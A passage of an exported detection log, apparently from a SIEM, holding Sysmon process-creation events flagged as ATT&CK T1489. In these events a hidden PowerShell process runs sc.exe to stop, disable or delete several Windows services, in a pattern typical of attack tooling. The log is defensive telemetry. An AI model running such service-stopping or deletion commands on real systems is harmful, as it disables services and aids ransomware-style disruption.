5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:27.600"",""processGuid"":""{df9fc3d3-b3cf-5ecf-0000-00104b1d2b00}"",""processId"":""6016"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""NetMsmqActiv Media NVIDIA\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.630",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:27.206 +ProcessGuid: {df9fc3d3-b3cf-5ecf-0000-0010eb1a2b00} +ProcessId: 6008 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:27.210380900Z"",""eventRecordID"":""3168"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:27.206\r\nProcessGuid: {df9fc3d3-b3cf-5ecf-0000-0010eb1a2b00}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:27.206"",""processGuid"":""{df9fc3d3-b3cf-5ecf-0000-0010eb1a2b00}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.514",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.455 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-001079162b00} +ProcessId: 696 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.458180000Z"",""eventRecordID"":""3165"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.455\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-001079162b00}\r\nProcessId: 696\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.455"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-001079162b00}"",""processId"":""696"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.437",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.341 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010de132b00} +ProcessId: 4240 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.344226400Z"",""eventRecordID"":""3163"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.341\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010de132b00}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.341"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-0010de132b00}"",""processId"":""4240"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.398",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.192 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-00106c122b00} +ProcessId: 7804 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.239281600Z"",""eventRecordID"":""3162"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.192\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-00106c122b00}\r\nProcessId: 7804\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.192"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-00106c122b00}"",""processId"":""7804"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.270",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.144 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-00105f0f2b00} +ProcessId: 8064 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.146924900Z"",""eventRecordID"":""3159"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.144\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-00105f0f2b00}\r\nProcessId: 8064\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.144"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-00105f0f2b00}"",""processId"":""8064"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.081",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.096 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010b60b2b00} +ProcessId: 5728 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.101634100Z"",""eventRecordID"":""3156"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.096\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010b60b2b00}\r\nProcessId: 5728\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.096"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-0010b60b2b00}"",""processId"":""5728"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 